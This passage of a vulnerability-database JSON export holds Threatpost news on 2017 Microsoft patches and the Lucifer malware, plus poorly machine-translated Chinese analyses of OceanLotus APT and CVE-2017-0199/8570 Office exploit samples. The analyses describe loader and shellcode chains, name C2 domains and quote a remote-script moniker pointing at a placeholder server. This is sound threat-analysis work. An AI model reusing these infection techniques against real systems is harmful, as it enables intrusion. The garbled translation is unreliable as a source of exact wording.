(ZDI).\n\nThose critical patches were supplemented Tuesday by additional patches released by Microsoft on the same day that address[ fixes for unsupported versions of Windows such as Windows XP and Windows Server 2003](<https://threatpost.com/risk-of-destructive-cyber-attacks-prompts-microsoft-to-update-xp-again/126235/>). The fixes are meant to prevent the stop the WannaCry [ransomware outbreak from last month](<https://support.microsoft.com/en-ca/help/4025685/microsoft-security-advisory-4025685-guidance>). The patch follows an [emergency patch released just weeks ago, also for XP](<https://threatpost.com/microsoft-releases-xp-patch-for-wannacry-ransomware/125671/>). The updates can be found at Microsoft Download Center, but won\u2019t be automatically be delivered through Windows Update.\n\nAccording security experts at Qualys, another high-priority issue for sysadmin should be a Windows Graphics RCE Vulnerability ([CVE-2017-8527](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8527>)). This vulnerability is triggered when users view a malicious website with specially crafted fonts. \u201cA remote code execution vulnerability exist when the Windows font library improperly handles specially crafted embedded fonts. An attacker who successfully exploited this vulnerability could take control of the affected system,\u201d [Microsoft notes](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8527>).\n\n\u201cOverall it\u2019s a large security update which is almost double as compared to last two months in the number of patched vulnerabilities. Actively exploited SMB issue CVE-2017-8543 and other Font, Outlook, Office, Edge and IE issues are sure to keep system administrators and security teams busy,\u201d said Amol Sarwate, director of engineering at Qualys.\n\nSarwate advises organizations using Outlook that they should also prioritize a patch for a Microsoft Office Memory Corruption Vulnerability ([CVE-2017-8507](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8507>)), which attackers can exploit by sending a malicious e-mail to a target and take complete control when the recipient views the message in Outlook.\n\nLastly, Microsoft patches Microsoft Edge and IE for several remote code execution issues ([CVE-2017-8498](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8498>), [CVE-2017-8530](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8530>) and [CVE-2017-8523](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8523>)) that are particularly important as they have been publicly disclosed although no attacks have been observed yet, according to Qualys.\n\nEarlier in the day, [Adobe fixed 21 vulnerabilities across four products](<https://threatpost.com/adobe-fixes-21-critical-vulnerabilities-with-june-patch-tuesday-update/126230/>) \u2013 Flash, Shockwave Player, Captivate, and Adobe Digital Editions.\n", "cvss3": {}, "published": "2017-06-13T16:23:28", "type": "threatpost", "title": "Microsoft Patches Two Critical Vulnerabilities Under Attack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-8464", "CVE-2017-8498", "CVE-2017-8507", "CVE-2017-8523", "CVE-2017-8527", "CVE-2017-8530", "CVE-2017-8543"], "modified": "2017-06-13T20:23:28", "id": "THREATPOST:15B0A575618A05410227B72FFBBC216F", "href": "https://threatpost.com/microsoft-patches-two-critical-vulnerabilities-under-attack/126239/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-10-16T22:40:45", "description": "Security experts have identified a self-propagating malware, dubbed Lucifer, that targets Windows systems with cryptojacking and distributed denial-of-service (DDoS) attacks.\n\nThe never-before-seen malware initially tries to infect PCs by bombarding them with exploits in hopes of taking advantage of an \u201cexhaustive\u201d list of unpatched vulnerabilities. While patches for all the critical and high-severity bugs exist, the various companies impacted by the malware had not applied the fixes.\n\n\u201cLucifer is a new hybrid of cryptojacking and DDoS malware variant that leverages old vulnerabilities to spread and perform malicious activities on Windows platforms,\u201d said researchers with Palo Alto Networks\u2019 Unit 42 team, on[ Wednesday in a blog post](<https://unit42.paloaltonetworks.com/lucifer-new-cryptojacking-and-ddos-hybrid-malware/>). \u201cApplying the updates and patches to the affected software are strongly advised.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe vulnerabilities targeted by Lucifer include Rejetto HTTP File Server ([CVE-2014-6287](<https://nvd.nist.gov/vuln/detail/CVE-2014-6287>)), Oracle Weblogic ([CVE-2017-10271](<https://nvd.nist.gov/vuln/detail/CVE-2017-10271>)), ThinkPHP RCE ([CVE-2018-20062](<https://nvd.nist.gov/vuln/detail/CVE-2018-20062>)), Apache Struts ([CVE-2017-9791](<https://nvd.nist.gov/vuln/detail/CVE-2017-9791>)), Laravel framework [CVE-2019-9081](<https://nvd.nist.gov/vuln/detail/CVE-2019-9081>)), and Microsoft Windows ([CVE-2017-0144](<https://nvd.nist.gov/vuln/detail/CVE-2017-0144>), [CVE-2017-0145](<https://nvd.nist.gov/vuln/detail/CVE-2017-0145>), and [CVE-2017-8464](<https://nvd.nist.gov/vuln/detail/CVE-2017-8464>)).\n\nAfter successfully exploiting these flaws, the attacker then connects to the command-and-control (C2) server and executes arbitrary commands on the vulnerable device, said researchers. These commands include performing a TCP, UDP or HTTP [DoS attack](<https://threatpost.com/massive-ddos-amazon-telecom-infrastructure/150096/>). Other commands allow the malware to drop an [XMRig miner](<https://threatpost.com/new-cryptominer-distributes-xmrig-in-aggressive-attacks/132027/>) and launch [cryptojacking attacks](<https://threatpost.com/hackers-exploit-critical-flaw-in-ghost-platform-with-cryptojacking-attack/155431/>), as well as collecting interface info and sending the miner status to the C2. Researchers say that as of Wednesday, the XMR wallet has paid 0.493527 XMR (approximately $32).\n\nThe malware is also capable of self-propagation through various methods.\n\nIt scans either for open instances of TCP port 1433 or Remote Procedure Call (RPC) port 135. If either of these are open, the malware attempts to brute-force the login using a default administrator username and an embedded password list (a full list of the passwords used can be found on Unit 42\u2019s analysis). It then copies and runs the malware binary on the remote host upon successful authentication.\n\nIn addition to brute-forcing credentials, the malware leverages exploitation for self-propagation. If the Server Message Block (SMB) protocol (a network file sharing protocol) is open, Lucifer executes several backdoors. These include the [EternalBlue](<https://threatpost.com/tag/eternalblue/>), [EternalRomance](<https://threatpost.com/eternalromance-exploit-found-in-bad-rabbit-ransomware/128645/>), and [DoublePulsar](<https://threatpost.com/nsas-doublepulsar-kernel-exploit-in-use-internet-wide/125165/>) exploits.\n\nOnce these three exploits have been used, the certutil utility is then used to propagate the malware. Certutil.exe is a command-line program, installed as part of Certificate Services, that can be used to dump and display certification authority (CA) configuration information, configure Certificate Services, backup and restore CA components, and verify certificates.\n\nLucifer has been discovered in a series of recent attacks that are still ongoing. The first wave occurred on June 10. The attackers then resumed their campaign on June 11 with an upgraded version of the malware. Researchers say these updates include the addition of an anti-sandbox capability, an anti-debugger technique, and new checks for device drivers, DLLs and virtual devices.\n\nThese added capabilities show that the malware is growing in sophistication, researchers warn. They say, enterprises can protect themselves with simply security measures such as applying patches and strengthening passwords.\n\n\u201cWhile the vulnerabilities abused and attack tactics leveraged by this malware are nothing original, they once again deliver a message to all organizations, reminding them why it\u2019s utterly important to keep systems up-to-date whenever possible, eliminate weak credentials, and have a layer of defenses for assurance,\u201d stressed researchers.\n\n_This article was updated on June 25 to reflect the accurate conversion of XMR to USD._\n\n**_BEC and enterprise email fraud is surging, but DMARC can help \u2013 if it\u2019s done right. On July 15 at 2 p.m. ET, join Valimail Global Technical Director Steve Whittle and Threatpost for a [FREE webinar](<https://attendee.gotowebinar.com/register/441045308082589963?source=art>), \u201cDMARC: 7 Common Business Email Mistakes.\u201d This technical \u201cbest practices\u201d session will cover constructing, configuring, and managing email authentication protocols to ensure your organization is protected. [Click here to register](<https://attendee.gotowebinar.com/register/441045308082589963?source=art>) for this Threatpost webinar, sponsored by Valimail._**\n", "cvss3": {}, "published": "2020-06-24T21:20:16", "type": "threatpost", "title": "Self-Propagating Lucifer Malware Targets Windows Systems", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2014-6287", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-10271", "CVE-2017-8464", "CVE-2017-9791", "CVE-2018-20062", "CVE-2019-9081"], "modified": "2020-06-24T21:20:16", "id": "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "href": "https://threatpost.com/self-propagating-lucifer-malware-targets-windows-systems/156883/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "myhack58": [{"lastseen": "2018-04-27T15:50:59", "description": "Sea Lotus\uff08OceanLotus\uff09APT gang is a highly organized, professional foreign national hacker group, the oldest by 360 days eye Labs discovered and disclosed. The organization since at least 2012 and 4 January will be for the Chinese government, research institutes, Maritime institutions, Maritime construction, shipping companies and other related important areas of organized, systematic, targeted, long uninterrupted attacks. \nRecently, the 360 Threat Intelligence Center captured one of the gang's latest attack samples, the analysis showed that the use of the Microsoft Office vulnerabilities related to malicious code delivery, in the sample for a detailed analysis, and the associated communication infrastructure associated with development, we found a new batch of samples and domain name/IP, based on these information, we will eventually provide some 360 Threat Intelligence Center within the field of view of the information to form a larger puzzle. \nSample analysis \nMD5: the 72bebba3542bd86dc68a36fda5dbae76 \nFile name: MonthlyReport 03.2018.doc \nThe sample is an RTF document, its use OfficeCVE-2017-8570 vulnerability to trigger the execution of the VBS script, the script further decryption performs the DLL file as well as ShellCode, the ShellCode will eventually decrypt the Trojan main control module and to achieve the memory load execution. \nCVE-2017-8570 \nRTF document embedded in a three Package object, respectively, corresponding to VXO53WRTNO. 000, a fonts. vbs and 3N79JI0QRZHGYFP. sct: the \n! [](/Article/UploadPic/2018-4/201842619841245. png? www. myhack58. com) \nAs well as a CVE-2017-8570 vulnerability OLE2Link object, to confuse the post as follows: \n! [](/Article/UploadPic/2018-4/201842619841649. png? www. myhack58. com) \nWherein the Package object comprises a file of the original path information: C:\\Users\\HNHRMC\\AppData\\Local\\Temp\\VXO53WRTNO.000 \n! [](/Article/UploadPic/2018-4/201842619841309. png? www. myhack58. com) \nThe vulnerability is triggered after the start 3N79JI0QRZHGYFP. sct, the script by CMD. EXE perform fonts. vbs script: \n! [](/Article/UploadPic/2018-4/201842619841299. png? www. myhack58. com) \nfonts. vbs \nfonts. vbs file actually acts as a Loader function, when fonts. vbs is executed, first the Temp directory under the VXO53WRTNO. 000 content read into memory, and then through the Base64 decoded and then through the AES decrypted ShellCode is. The last will of its own hard-coded Load_dll in the same way to decrypt it, and dynamically load Load_dll, and instantiate one of the sHElla object, ultimately by calling the sHElla. forebodinG(shellcode)method of the ShellCode executed: \n! [](/Article/UploadPic/2018-4/201842619842255. png? www. myhack58. com) \n\n! [](/Article/UploadPic/2018-4/201842619842431. png? www. myhack58. com) \nLoad_dll \nLoad_dll of forebodinG method function is the received ShellCode, copied to a new allocated memory, and the memory address is converted into a corresponding delegate is invoked to execute: \n! [](/Article/UploadPic/2018-4/201842619842220. png? www. myhack58. com) \n\n! [](/Article/UploadPic/2018-4/201842619842512. png? www. myhack58. com) \nShellCode \nShellCode is part of the function from itself extracted out of a PE file, then the PE file is loaded into memory for execution. The PE file's export name is: {A96B020F-0000-466F-A96D-A91BBF8EAC96}. dll, the following figure is after correction of the PE header data: \n! [](/Article/UploadPic/2018-4/201842619842916. png? www. myhack58. com) \nDump DLL File Export name information: \n! [](/Article/UploadPic/2018-4/201842619843635. png? www. myhack58. com) \n{A96B020F-0000-466F-A96D-A91BBF8EAC96}. dll \nDecrypt the DLL resource in an encrypted resource file: \n! [](/Article/UploadPic/2018-4/201842619845229. png? www. myhack58. com) \nThe DLL runtime, you first access the resource file, for RC4 decryption: \n! [](/Article/UploadPic/2018-4/201842619845919. png? www. myhack58. com) \nThe decrypted resource file contains a Trojan configuration information and 3 network communication related DLL Files, the network communication associated file to support HTTP, HTTPS and UDP Protocol communication. The following figure is the decrypted resource file information: \n! [](/Article/UploadPic/2018-4/201842619845124. png? www. myhack58. com) \nAfter analysis, the profiles of the relevant data structure is as follows: \n! [](/Article/UploadPic/2018-4/201842619845650. png? www. myhack58. com) \nImmediately the DLL will be loaded in memory A resource file after decryption of the three network-related DLLS \u7136\u540e\u83b7\u53d6\u672c\u673a\u4fe1\u606f\u5e76\u7ecf\u8fc7\u7f16\u7801\u540e\u4e0eicmannaws.com and orinneamoure.com and ochefort. com these three domains are combined to form a secondary domain is used for network communication, the final acceptance of the control end instruction to achieve the following Remote Control Features: \n\n\n**[1] [[2]](<90088_2.htm>) [next](<90088_2.htm>)**\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-04-26T00:00:00", "type": "myhack58", "title": "Sea Lotus APT groups use CVE-2017-8570 vulnerability of the new sample and Association analysis-vulnerability warning-the black bar safety net", "bulletinFamily": "info", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8570"], "modified": "2018-04-26T00:00:00", "id": "MYHACK58:62201890088", "href": "http://www.myhack58.com/Article/html/3/62/2018/90088.htm", "sourceData": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-06-14T16:17:00", "description": "Microsoft 6, on patch day the disclosure of the two being the use of a remote code execution vulnerability(CVE-2017-8543)Windows Search remote code execution vulnerability(CVE-2017-8464)LNK file shortcut remote code execution vulnerability. \nVulnerability name: Windows Search remote code execution vulnerability \nVulnerability ID: CVE-2017-8543 \nVulnerability rating: Critical \nVulnerability summary: Windows Search service for WSS is windows A enabled by default for basic services. Allows the user in a plurality of Windows of service between the client and the search. When Windows Search handle objects in memory, there is a remote code execution vulnerability. Successful exploitation of this vulnerability an attacker can control an affected system. \nIn order to exploit this vulnerability, an attacker may be able to the Windows Search service to send a carefully the structure of the SMB message. To exploit this vulnerability to elevate privileges and control of the computer. In addition, in the enterprise scenario, an unauthenticated attacker can pass the SMB service to connect the remote trigger the vulnerability, and then control the target computer. \nThe affected version \nDesktop: Windows 10, 7, 8, 8.1, Vista, Xp, and Windows RT 8.1 \nServer System: Windows Server 2016, and in 2012, 2008, 2003 \nRepair solutions: \nDesktop Windows 10, 7, 8.1 and Windows RT 8.1; Server System: Windows Server 2016, the 2012, the 2008, can through the Windows Update Automatic Updates Microsoft patch way to repair. \nWindows 8, Vista, Xp and Windows Server 2003 can select the corresponding version and then manually update the patches to be updated \n\uff08Patch download address reference https://support.microsoft.com/zh-cn/help/4025687/microsoft-security-advisory-4025685-guidance-for-older-platforms \nVulnerability name: LNK file shortcut remote code execution vulnerability \nVulnerability ID: CVE-2017-8464 \nVulnerability rating: Critical \nVulnerability summary: if a user open an attacker carefully constructed malicious LNK files, it will result in remote code execution. Successful exploitation of this vulnerability an attacker can get the local user with the same user permissions. \nThe attacker can be through removable drives, USB flash drive or a remote share, etc. containing a malicious LNK files and associated malicious binary file is propagated to the user. When the user through Windows Explorer or any be able to parse LNK files to the program open a malicious. LNK file, associated with the malicious binary code on the target system execution. \nThe affected version \nDesktop: Windows 10, 7, 8.1, 8, Vista, and Windows RT 8.1 \nServer System: Windows Server 2016, the 2012, the 2008 \nRepair solutions: \nDesktop Windows 10,7,8. 1, and Windows RT 8.1; Server System: Windows Server 2016, the 2012, the 2008, can through the Windows Update Automatic Updates Microsoft patch way to repair. \nWindows 8, Vista can select the corresponding version and then manually update the patches to be updated \n\uff08Patch download address reference https://support.microsoft.com/zh-cn/help/4025687/microsoft-security-advisory-4025685-guidance-for-older-platforms \nReference \nhttps://threatpost.com/microsoft-patches-two-critical-vulnerabilities-under-attack/126239/ \nhttps://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8543 \nhttps://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8464 \nhttps://support.microsoft.com/zh-cn/help/4025687/microsoft-security-advisory-4025685-guidance-for-older-platforms \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-06-14T00:00:00", "type": "myhack58", "title": "\u3010Major vulnerability warning\u3011Windows two critical remote code execution vulnerability-vulnerability warning-the black bar safety net", "bulletinFamily": "info", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8464", "CVE-2017-8543"], "modified": "2017-06-14T00:00:00", "id": "MYHACK58:62201787021", "href": "http://www.myhack58.com/Article/html/3/62/2017/87021.htm", "sourceData": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-08-11T15:16:29", "description": "The so-called CVE-2017-8570 sample \nLast week, 360 days eye lab found foreign hackers on Github released a CVE-2017-8570 exploits code, but then deleted, in order to find quite a few labeled as CVE-2017-8570 Office malware samples, such as the following VirusTotal is marked as CVE-2017-8570 sample. \n! [](/Article/UploadPic/2017-8/2017811192832900. png? www. myhack58. com) \nAfter 360 days the eye Laboratory of the analysis, we found relevant the use of the code still using the old CVE-2017-0199, rather than the new CVE-2017-8570\u3002 Our analysis is as follows, for peer reference. \nThe first analysis of the sample in the ppt\\slides\\\\_rels\\slide1. xml. rels file, rId3 is an OLE object, point to an external link, note that the string \u201dscript:http//[server]/test. sct\u201d, which is important to\u201dscript:\u201dand here identifies the next step is to use the Moniker by MkParseDisplayName (The), which is the Script Moniker is. \n! [](/Article/UploadPic/2017-8/2017811192833273. png? www. myhack58. com) \nWhile the Script Moniker is exactly what Microsoft 4 month patch to disable out of the two Moniker: \n! [](/Article/UploadPic/2017-8/2017811192833131. png? www. myhack58. com) \n2017 year 4 months, to fix CVE-2017-0199 disabled when a htafile object and the script object: \nDisable the CLSID \nProgID \nCVE \n{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B} \nhtafile \nCVE-2017-0199 \n{06290BD3-48AA-11D2-8432-006008C3FBFC} \nscript \nCVE-2017-0199 \nThe following stack structure reflects not hit on the CVE-2017-0199 patch environment the following sample execution of the process: \n0:000&gt; k \nChildEBP RetAddr \n003c2ea4 6c49d2f5 kernel32! CreateProcessW \n003c2f2c 6c49d5f7 wshom! CWshShell::CreateShortcut+0x161 \n003c2f8c 75753e75 wshom! CWshShell::Exec+0x19a \n003c2fac 75753cef OLEAUT32! DispCallFunc+0x165 \n003c303c 6c4a0267 OLEAUT32! CTypeInfo2::Invoke+0x23f \n003c306c 6c4967d5 wshom! CDispatch::Invoke+0x5c \n003c3098 7005dc18 wshom! CWshEnvRegistry::Invoke+0x29 \n003c30d8 7005db6c jscript! IDispatchInvoke2+0xf0 \n003c3114 7005dadf jscript! IDispatchInvoke+0x6a \n003c31d4 7005dc6a jscript! InvokeDispatch+0xa9 \n003c3200 7005d9a8 jscript! VAR::InvokeByName+0x93 \n003c324c 7005da4f jscript! VAR::InvokeDispName+0x7d \n003c3278 7005e4c7 jscript! VAR::InvokeByDispID+0xce \n003c3414 70055d7d jscript! CScriptRuntime::Run+0x2b80 \n003c34fc 70055cdb jscript! ScrFncObj::CallWithFrameOnStack+0xce \n003c3544 70055ef1 jscript! ScrFncObj::Call+0x8d \n003c35c0 7005620a jscript! CSession::Execute+0x15f \n003c360c 70050399 jscript! COleScript::ExecutePendingScripts+0x1bd \n003c362c 7301831f jscript! COleScript::SetScriptState+0x98 \n003c363c 73018464 tongfang! ScriptEngine::Activate+0x1a \n003c3654 730199d3 tongfang! ComScriptlet::Inner::StartEngines+0x6e \n003c36a4 7301986e tongfang! ComScriptlet::Inner::Init+0x156 \n003c36b4 7301980b tongfang! ComScriptlet::New+0x3f \n003c36d4 730197d0 tongfang! ComScriptletConstructor::CreateScriptletFromNode+0x26 \n003c36f4 730237e2 tongfang! ComScriptletConstructor::Create+0x4c \n003c3714 73024545 tongfang! ComScriptletFactory::CreateScriptlet+0x1b \n003c3734 76fcc6fd tongfang! ComScriptletMoniker::BindToObject+0x4d \n003c3760 7708440c ole32! BindMoniker+0x64 \n003c37e8 770c5c07 ole32! wCreateLinkEx+0x9f \n003c3848 770c6137 ole32! OleCreateLinkEx+0xaa \n003c3884 713a2f10 ole32! OleCreateLink+0x42 \nWARNING: Stack unwind information not available. Following frames may be wrong. \n003c59c4 7124e908 ppcore! DllGetLCID+0x2b3090 \n003c6a60 710928e4 ppcore! DllGetLCID+0x15ea88 \n003c6a90 714adb02 ppcore! PPMain+0x2cf6c \nThe sample is actually CVE-2017-0199 another using the way to insert htafile or script, instead of CVE-2017-8570 \u3002 \nCVE-2017-0199 patch trap \nFor the above this so-called CVE-2017-8570 samples is, in fact, CVE-2017-0199 in we thought we hit the CVE-2017-0199 patch the machine is running, the vulnerability can actually be triggered. After deeper analysis, we found the problem in the patch didn't hit full on. \nMicrosoft 4 released in May of CVE-2017-0199 patch is divided into two parts, one is for Office patch\uff08\u4fee\u6539MSO.dll A is to Windows patch\uff08\u4e3b\u8981\u4fee\u6539\u4e86ole32.dll the two patches must be installed before you can guarantee that is not affected by CVE-2017-0199 impact. \n! [](/Article/UploadPic/2017-8/2017811192833796. png? www. myhack58. com) \nThe red box is part of the Office patches, the blue box part of the Windows System patches. \nWindows System patches will mostly be a normal installation, but the Office of whether the patch can be installed properly depending on the current version, Microsoft in the Security Advisory listed in the May patch version of Office are as follows: \nMicrosoft Office 2007 Service Pack 3 \nMicrosoft Office 2010 Service Pack 2 (32-bit editions) \nMicrosoft Office 2010 Service Pack 2 (64-bit editions) \nMicrosoft Office 2013 RT Service Pack 1 \nMicrosoft Office 2013 Service Pack 1 (32-bit editions) \nMicrosoft Office 2013 Service Pack 1 (64-bit editions) \nMicrosoft Office 2016 (32-bit edition) \nMicrosoft Office 2016 (64-bit edition) \nNeed to note is that Microsoft gives the patch is closely matched to the Office of a large version of a service pack, as Microsoft offers the Microsoft Office 2013 Service Pack 1 patch, and for some earlier versions of Office such as Microsoft Office 2013 will not install CVE-2017-0199 mso patch, you need to first upgrade to the latest SP1 version. There is also that is, all not in the above listed versions of Office are unable to use the normal patched, or will be affected by the 0199 vulnerability, the following are examples. \n\n\n**[1] [[2]](<88542_2.htm>) [next](<88542_2.htm>)**\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-08-11T00:00:00", "type": "myhack58", "title": "Oolong CVE-2017-8570 samples and behind the idea-vulnerability warning-the black bar safety net", "bulletinFamily": "info", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8570", "CVE-2017-0199"], "modified": "2017-08-11T00:00:00", "id": "MYHACK58:62201788542", "href": "http://www.myhack58.com/Article/html/3/62/2017/88542.htm", "sourceData": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-08-09T15:19:37", "description": "Office of the senior threat vulnerability background \nIn the advanced threat attack, the hackers remote delivery invasion client the most like the vulnerability is office documents vulnerability in the just-concluded black hat conference, the best client security vulnerabilities award went to CVE-2017-0199 vulnerability, this vulnerability is nowadays office vulnerability areas most popular security vulnerabilities, the best client security vulnerabilities of this honor attributed to Ryan Hanson, And Haifei li, Bing Sun and unknown hacker. \n\n! [](/Article/UploadPic/2017-8/2017881861997. png? www. myhack58. com) \nCVE-2017-0199 is the Office series of Office software in a logical vulnerability, and a conventional memory corruption-type vulnerabilities is different, this type of vulnerability without the complexity of using the technique, directly in office a document to run arbitrary malicious script, use stable and reliable. Microsoft in year 4 on security updates for CVE-2017-0199 vulnerabilities were fixed, but the security patch of the repair and Defense can still be bypassed, in 7 on Microsoft's security update also fixes the same type of new Vulnerability, CVE-2017-8570\u3002 In Syscan360 2017 Seattle Safety meeting, Haifei li and Bing Sun of the topic of the Moniker magic: direct in Microsoft Office, run the script on a detailed analysis of such vulnerability in principle, this article will not repeat them here, the following began to focus on the analysis of these vulnerabilities in the wild exploit. \nThe wild use of the first RTF version \nCVE-2017-0199 vulnerabilities in the first time been disclosed, the wild the earliest use of the sample is in word document form for dissemination use, because office document suffix is associated with the loose parsing features, change other document extension, the attack can still be successful, so the wild use most of the malicious document the true File format is RTF, but the malicious document extension is doc, docx, etc. suffix, the attack has a strong camouflage to deceive the characteristics. In the wild use the sample file format has a keyword section objupdate, and the role of this field is automatically updated to the object, when the victim open the office document when it loads the remote URL object on the remote server to trigger an HTTP request, a malicious Server against the client's http request to force the return Content-type to application/hta response, and ultimately the client office processes the remote file is downloaded as a hta script is run, the entire attack process is stable and does not require victims of any interaction. \n\n! [](/Article/UploadPic/2017-8/2017881861193. png? www. myhack58. com) \nThe wild use of the second PPSX version \nSince the RTF version of the exploit a lot use, the home security software detection rates are also relatively high, the attacker began to turn to another kind of office document formats for an attack, the attacker found the ppsx format of a slides document can also be no interaction to trigger the vulnerability, the use of the principle is to use the slide animation event, when the slide some of the predefined trigger event may be triggered automatically lead to exploits. \nThe following figure, a popular attack samples embedded in malicious animation event: \n\n! [](/Article/UploadPic/2017-8/2017881862289. png? www. myhack58. com) \nThe event will be associated with a olelink object, the principle is similar to the rtf version of the following xml in the fields. \n\n! [](/Article/UploadPic/2017-8/2017881862532. png? www. myhack58. com) \nBut the object will be embedded with a script Protocol header of the remote address, and the url address of the XML file is a malicious sct script. \n\n! [](/Article/UploadPic/2017-8/2017881862929. png? www. myhack58. com) \nWhen the victims open the malicious slide the document will automatically load a remote URL object on the remote server to initiate an HTTP request to download the file to local, and ultimately the client office processes will be downloaded to the local file as the sct script execution. \nLatest popular third a DOCX version \nRecently we found a part of the real File format is Docx format document added CVE-2017-0199 exploit, the attacker very cleverly CVE-2017-0199 vulnerability in the RTF file as a source embedded into the Docx document format, so that the resulting docx file when opened is automatically go to remote access contain 0199 vulnerability in the rtf file, and then trigger behind a series of attacks, such attacks increased the security software Avira difficulty, some antivirus software without noticed! \nThe following figure, we will find docx format document embed a remote document object: \n\n! [](/Article/UploadPic/2017-8/2017881862940. png? www. myhack58. com) \nWith a document open, it will automatically open a remote malicious RTF files! \n\n! [](/Article/UploadPic/2017-8/2017881862112. png? www. myhack58. com) \nWe can see in the wild use the RTF sample in the VT detection rate to 31/59 In. \n\n! [](/Article/UploadPic/2017-8/2017881862507. png? www. myhack58. com) \nAnd the latest popular DOCX version of the detection rate is only 5/59 In. \n\n! [](/Article/UploadPic/2017-8/2017881862829. png? www. myhack58. com) \nThe latest discovery of the\u201cOolong\u201dsample \nLast week we in the outside world found a lot of examples labeled as CVE-2017-8570 office slide document malicious sample, while there are vendors claimed that the first time to capture the latest office vulnerability, but after analysis we found that the sample is still CVE-2017-0199 vulnerability in the wild using the second PPSX version, by a typical example of the sample analysis, we found that the sample use of the payload is Loki Bot theft type of Trojan viruses, together with the targeted theft attacks. \n\n! [](/Article/UploadPic/2017-8/2017881862994. png? www. myhack58. com)\n\n**[1] [[2]](<88439_2.htm>) [next](<88439_2.htm>)**\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-08-08T00:00:00", "type": "myhack58", "title": "Office of the senior threat vulnerability in the wild use analysis-vulnerability warning-the black bar safety net", "bulletinFamily": "info", "hackapp": {}, "cvss2": {"severity": "HIGH", 